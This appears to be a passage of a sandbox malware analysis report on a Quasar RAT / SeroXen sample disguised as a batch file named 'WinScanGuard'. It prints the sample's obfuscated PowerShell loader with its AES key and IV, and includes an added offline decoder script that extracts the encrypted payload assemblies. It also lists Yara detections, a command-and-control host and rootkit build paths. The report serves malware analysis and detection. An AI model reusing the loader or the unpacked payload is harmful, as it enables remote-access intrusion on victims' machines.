[Microsoft.Win32.Registry]::$xCumf.$SPFoS($tSRUF).$sLsEZ($tbgVF);$QCqEG=[string[]]$BcpNi.Split('\');$BPwjg=MiajR(ZXowG([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[1])));DEttm $BPwjg (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$RLOOe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QCqEG[0]);$HJBVM = New-Object System.Security.Cryptography.AesManaged;$HJBVM.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$SHNYR = $HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')();$RLOOe = $SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RLOOe, 0, $RLOOe.Length);$SHNYR.Dispose();$HJBVM.Dispose();$VHZiJ = New-Object System.IO.MemoryStream(, $RLOOe);$MKYCr = New-Object System.IO.MemoryStream;$pphYy = New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::$tSRUF1);$pphYy.$WAkXF($MKYCr);$pphYy.Dispose();$VHZiJ.Dispose();$MKYCr.Dispose();$RLOOe = $MKYCr.ToArray();$jMAvT = $iBFKh | IEX;$mZolj = $jMAvT::$tSRUF2($RLOOe);$lOFyP = $mZolj.EntryPoint;$lOFyP.$tSRUF0($null, (, [string[]] ($mjWsq))) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • dllhost.exe (PID: 5800 cmdline: C:\Windows\System32\dllhost.exe /Processid:{ee0091e4-9e0c-4ff3-b26f-57d4a238bd7c} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
            • dllhost.exe (PID: 2740 cmdline: C:\Windows\System32\dllhost.exe /Processid:{f78b27af-93da-4459-95e7-4c5d26a44dc8} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
              • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 6720 cmdline: C:\Windows\System32\dllhost.exe /Processid:{85d85a52-fed6-47b1-b615-c3a69ff1ad14} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
              • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dllhost.exe (PID: 6020 cmdline: C:\Windows\System32\dllhost.exe /Processid:{59453cd9-80c7-4c7f-84ca-38ec20f032b9} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
            • dllhost.exe (PID: 6700 cmdline: C:\Windows\System32\dllhost.exe /Processid:{8b9e4941-156b-4561-b75c-88dc752d3d8b} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • dwm.exe (PID: 988 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
        • dllhost.exe (PID: 8 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{f5381469-1700-4694-82dd-1722ad94b3e0} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • WmiPrvSE.exe (PID: 2720 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
          • PHZMpSLEzcFKaRUZszZmeOVApLd.exe (PID: 3848 cmdline: "C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • PHZMpSLEzcFKaRUZszZmeOVApLd.exe (PID: 4008 cmdline: "C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dllhost.exe (PID: 3164 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{8c0bd129-911b-4af2-a0bc-93995d45cd5f} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
          • PHZMpSLEzcFKaRUZszZmeOVApLd.exe (PID: 2736 cmdline: "C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dllhost.exe (PID: 6280 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{0979c3ff-3e63-4ea9-9d2b-0e24c33cbca9} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 2344 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{da1a065e-b06d-4c17-9fd5-69413fe213f9} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
        • dllhost.exe (PID: 2664 cmdline: C:\Windows\SysWOW64\dllhost.exe /Processid:{2c62f067-a6a0-49cc-8f1a-bf6b18a4e5be} MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
  • cleanup
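The two PowerShell command lines in the tree above are the whole loader, and they are deliberately noisy rather than hard: every .NET member name is written backwards and re-joined at run time (`'gnirtS46esaBmorF'[-1..-16] -join ''` is `FromBase64String`, `'daoL'[-1..-4]` is `Load`), but the AES key and IV sit in clear text on the command line. Stage 1 (PID 7128) re-reads the .bat file, takes the first line starting with `SEROXEN`, splits the rest on `\`, and for each part does base64 decode, AES-CBC/PKCS7 decrypt, gunzip, `Assembly.Load()` and `EntryPoint.Invoke()`. Stage 2 (PID 5088) pulls the persisted payload back out of a registry value whose hive, subkey and value name are themselves AES-encrypted strings under a second key. The script below is an added example, not part of the report or the sample: it decrypts the stage-2 string table and extracts the stage-1 assemblies to disk without loading anything. The sample path and output folder are assumptions, and the role comments on the stage-2 strings are inferred from the call shape (`[Microsoft.Win32.Registry]::$xCumf.$SPFoS($tSRUF).$sLsEZ($tbgVF)`), not from the report.

```powershell
# Added example, not part of the Joe Sandbox report: offline decoder for the two
# PowerShell loader stages in the process tree. Nothing is executed or Assembly.Load()ed;
# payloads are only decrypted, gunzipped and written to disk for static analysis.
param(
    [string]$BatPath = '.\WinScanGuard_v.2.1.bat',   # location of the sample: an assumption
    [string]$OutDir  = '.\extracted'                 # output folder: an assumption
)

function Unprotect-AesCbc {
    param([byte[]]$Data, [string]$KeyB64, [string]$IvB64)
    # Same primitive the loader assembles from reversed strings
    # ('rotpyrceDetaerC' -> CreateDecryptor, 'kcolBlaniFmrofsnarT' -> TransformFinalBlock).
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [Convert]::FromBase64String($KeyB64)   # 32 bytes, so AES-256
    $aes.IV      = [Convert]::FromBase64String($IvB64)    # 16 bytes
    $dec = $aes.CreateDecryptor()
    try     { ,$dec.TransformFinalBlock($Data, 0, $Data.Length) }   # leading comma keeps the byte[] intact
    finally { $dec.Dispose(); $aes.Dispose() }
}

function Expand-Gzip {
    param([byte[]]$Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out); $gz.Dispose(); $in.Dispose()
    $bytes = $out.ToArray(); $out.Dispose()
    ,$bytes
}

# ---- Stage 2: the $sxr-powershell.exe command line (PID 5088) ----
# Registry location and .NET member names are AES-encrypted with a second key.
# Role comments are inferred from the call shape, not confirmed by the report.
$Stage2Key = 'jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='
$Stage2IV  = 'RiGEPzaIqqVKtP3vMKz42w=='
$Stage2Strings = [ordered]@{
    xCumf  = 'SdFQ7WIJndJ4NA0XksAXZg=='   # static member of [Microsoft.Win32.Registry]: the hive
    SPFoS  = 'QYOQkrgRiSqCZw4PoX3ndQ=='   # method called on the hive with $tSRUF (probably OpenSubKey)
    tSRUF  = '/drqfgtKhdXyibTYP3tLyQ=='   # its argument: the subkey path
    sLsEZ  = 'bw6rZXASWFOFrL4CLrePaw=='   # method called on the key with $tbgVF (probably GetValue)
    tbgVF  = 'uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU='   # its argument: the value name
    tSRUF3 = 'E46YnTPfmALJD+Ie1fVvGQ=='   # process name in the "exit if already running" check
    tSRUF1 = 'E8Y/0E3VS02vVNfuFqTGCw=='   # [IO.Compression.CompressionMode] member
    WAkXF  = 'AR4GvTa2A8uikK6+T2nKoQ=='   # GZipStream method that takes the output stream
    tSRUF2 = '3ob3sb5+Bgi0uwQxb9HNKg=='   # static method called with the assembly bytes
    tSRUF0 = 'L3o7gT8T96iY71qHMveksg=='   # method called on EntryPoint with ($null, args)
    mjWsq  = 'v2S4NwnXvXtvXwhesSwNIQ=='   # the single string argument handed to the payload
    sRLEH  = 'NPfQRzZslsp7LUVLS08LhQ=='   # decrypted by the loader but unused in the visible code
    iBFKh  = 'RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0='   # text piped to IEX; its result is what $tSRUF2 is invoked on
}
'== stage 2 string table =='
foreach ($name in $Stage2Strings.Keys) {
    $raw   = [Convert]::FromBase64String($Stage2Strings[$name])
    $plain = [System.Text.Encoding]::UTF8.GetString((Unprotect-AesCbc $raw $Stage2Key $Stage2IV))
    '{0,-6} = {1}' -f $name, $plain
}

# ---- Stage 1: the renamed powershell started by cmd.exe (PID 7128) ----
# base64 -> AES-CBC -> gunzip -> Assembly.Load() for each '\'-separated part of the
# SEROXEN line. This script stops before Load and writes the bytes out instead.
$Stage1Key = 'ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='
$Stage1IV  = 'CLQNYwl0vsdfD4X+5YKrxQ=='
$carrier = Get-Content -LiteralPath $BatPath -ErrorAction Stop |
           Where-Object { $_.StartsWith('SEROXEN') } | Select-Object -First 1
if (-not $carrier) { throw "no SEROXEN carrier line found in $BatPath" }
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$OutDir = (Resolve-Path -LiteralPath $OutDir).Path   # .NET file APIs do not follow PowerShell's current location
$parts  = $carrier.Substring(7).Split('\')
'== stage 1 embedded assemblies =='
for ($i = 0; $i -lt $parts.Length; $i++) {
    [byte[]]$pe = Expand-Gzip (Unprotect-AesCbc ([Convert]::FromBase64String($parts[$i])) $Stage1Key $Stage1IV)
    $dest = Join-Path $OutDir "stage1_part$i.bin"
    [IO.File]::WriteAllBytes($dest, $pe)
    # A managed assembly still begins with the MZ DOS stub; anything else means wrong key/IV or a different build.
    $mz = ($pe.Length -gt 2 -and $pe[0] -eq 0x4D -and $pe[1] -eq 0x5A)
    '{0}: {1} bytes, MZ header: {2}, SHA256: {3}' -f $dest, $pe.Length, $mz, (Get-FileHash -Algorithm SHA256 -LiteralPath $dest).Hash
}
```

The loader invokes part 1 before part 0, so expect two assemblies; the report's Yara hits on the Costura assembly loader and on Quasar RAT come from the unpacked memory of this stage, and the SHA256 printed for each dump is what to pivot on once the files are loaded into a .NET decompiler. Run this on an isolated analysis machine: the script never executes the payload, but the input file is live malware.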
Name: Quasar RAT, QuasarRAT
Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
No configs have been found
Yara matches (memory dumps):

Source: 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CosturaAssemblyLoader; Description: Yara detected Costura Assembly Loader; Author: Joe Security
Source: 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CosturaAssemblyLoader; Description: Yara detected Costura Assembly Loader; Author: Joe Security
Source: 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CosturaAssemblyLoader; Description: Yara detected Costura Assembly Loader; Author: Joe Security
Source: 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CosturaAssemblyLoader; Description: Yara detected Costura Assembly Loader; Author: Joe Security
Source: 00000012.00000002.3104746555.0000028539051000.00000004.00000800.00020000.00000000.sdmp; Rule: Quasar_RAT_1; Description: Detects Quasar RAT; Author: Florian Roth; Strings:
  • 0x3a67e8:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x3f6820:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x3a670c:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x3f6744:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x3a7152:$op3: 00 04 03 69 91 1B 40
  • 0x3a797b:$op3: 00 04 03 69 91 1B 40
  • 0x3f718a:$op3: 00 04 03 69 91 1B 40
  • 0x3f79b3:$op3: 00 04 03 69 91 1B 40
(3 further entries not shown)
Yara matches (unpacked PEs):

Source: 18.2.$sxr-powershell.exe.28538ad9110.10.unpack; Rule: JoeSecurity_CosturaAssemblyLoader; Description: Yara detected Costura Assembly Loader; Author: Joe Security
Source: 18.2.$sxr-powershell.exe.28538ad9110.10.raw.unpack; Rule: JoeSecurity_CosturaAssemblyLoader; Description: Yara detected Costura Assembly Loader; Author: Joe Security
Source: 18.2.$sxr-powershell.exe.285393991b8.13.unpack; Rule: Quasar_RAT_1; Description: Detects Quasar RAT; Author: Florian Roth; Strings:
  • 0x5c830:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0xac868:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5c754:$op2: 00 17 03 1F 20 17 19 15 28
  • 0xac78c:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x5d19a:$op3: 00 04 03 69 91 1B 40
  • 0x5d9c3:$op3: 00 04 03 69 91 1B 40
  • 0xad1d2:$op3: 00 04 03 69 91 1B 40
  • 0xad9fb:$op3: 00 04 03 69 91 1B 40
Source: 18.2.$sxr-powershell.exe.285393991b8.13.raw.unpack; Rule: Quasar_RAT_1; Description: Detects Quasar RAT; Author: Florian Roth; Strings:
  • 0x5e630:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0xae668:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x5e554:$op2: 00 17 03 1F 20 17 19 15 28
  • 0xae58c:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x5ef9a:$op3: 00 04 03 69 91 1B 40
  • 0x5f7c3:$op3: 00 04 03 69 91 1B 40
  • 0xaefd2:$op3: 00 04 03 69 91 1B 40
  • 0xaf7fb:$op3: 00 04 03 69 91 1B 40
Source: 18.2.$sxr-powershell.exe.28539411228.18.raw.unpack; Rule: Quasar_RAT_1; Description: Detects Quasar RAT; Author: Florian Roth; Strings:
  • 0x365f8:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x3651c:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x36f62:$op3: 00 04 03 69 91 1B 40
  • 0x3778b:$op3: 00 04 03 69 91 1B 40
(3 further entries not shown)

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Yara match; File source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR
Source: eu-central-7075.packetriot.net; Virustotal: Detection: 15%

Compliance

Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe; Unpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2100000.2.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe; Unpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2270000.5.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe; Unpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2290000.6.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe; Unpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2310000.8.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe; Unpacked PE file: 39.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2420000.4.unpack
Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exe; Unpacked PE file: 39.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2440000.5.unpack
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.sharpdx.dxgi.pdb.compressed|||SharpDX.DXGI.pdb|D73E59804E3EE494A4612185771F7F67B2FD64AE|34752 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mshta.pdbGCTL source: $sxr-mshta.exe, 0000000D.00000000.1920454183.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe, 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe.2.dr
Source: Binary string: costura.costura.pdb.compressed source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.sharpdx.pdb.compressed|||SharpDX.pdb|1A7C10AA582CCEEBFFD9BC77A11353AAAE6417E9|42824 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: #costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.sharpdx.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdbSHA256 source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: $sxr-cmd.exe, 00000010.00000000.1933753020.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe, 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe.2.dr
              Source: Binary string: mshta.pdb source: $sxr-mshta.exe, 0000000D.00000000.1920454183.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe, 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe.2.dr
              Source: Binary string: <Module>costura.metadatacostura.sharpdx.direct3d11.pdb.compressedcostura.costura.pdb.compressedcostura.sharpdx.dxgi.pdb.compressedcostura.sharpdx.pdb.compressedcostura.sharpdx.direct3d11.dll.compressedcostura.costura.dll.compressedcostura.sharpdx.dxgi.dll.compressedcostura.gma.system.mousekeyhook.dll.compressedcostura.system.runtime.interopservices.runtimeinformation.dll.compressedcostura.quasar.common.dll.compressedcostura.newtonsoft.json.dll.compressedcostura.bouncycastle.crypto.dll.compressedcostura.ionic.zip.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.protobuf-net.dll.compressedcostura.sharpdx.dll.compressed4a731784-801d-481b-a36f-654a2936777eQuasar.Client.InstallStager.exeQuasar.Client.UninstallStager.exeQuasar.Client.ResetPatcher.binQuasar.Client.QuasarApplication.resourcesQuasar.Client.Properties.Resources.resourcesILRepack.List source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\C5\Documents\SeroXen Stuff\Quasar-master\Quasar-master-release\bin\Release\net452\REPOS\seroxen rootkit stuff\InstallStager\bin\Release\InstallStager.pdb source: $sxr-powershell.exe, 00000012.00000002.3104746555.000002853878B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 00000025.00000000.2071708899.000000000059E000.00000002.00000001.01000000.0000000E.sdmp, PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 00000027.00000000.2076760645.000000000059E000.00000002.00000001.01000000.0000000E.sdmp, PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 0000002B.00000000.2087575742.000000000059E000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: cmd.pdbUGP source: $sxr-cmd.exe, 00000010.00000000.1933753020.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe, 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe.2.dr
              Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed|||SharpDX.Direct3D11.pdb|A2259A45EA284247B3AA65EC9C1DBEBD47FE208F|78220 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdbUGP source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726165397.00007FF60EAAA000.00000002.00000001.01000000.00000003.sdmp, $sxr-powershell.exe.2.dr, WinScanGuard_v.2.1.bat.exe.0.dr
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdb source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdb source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726165397.00007FF60EAAA000.00000002.00000001.01000000.00000003.sdmp, $sxr-powershell.exe.2.dr, WinScanGuard_v.2.1.bat.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: )costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ura.costura.pdb.X source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.costura.pdb.compressed8 source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
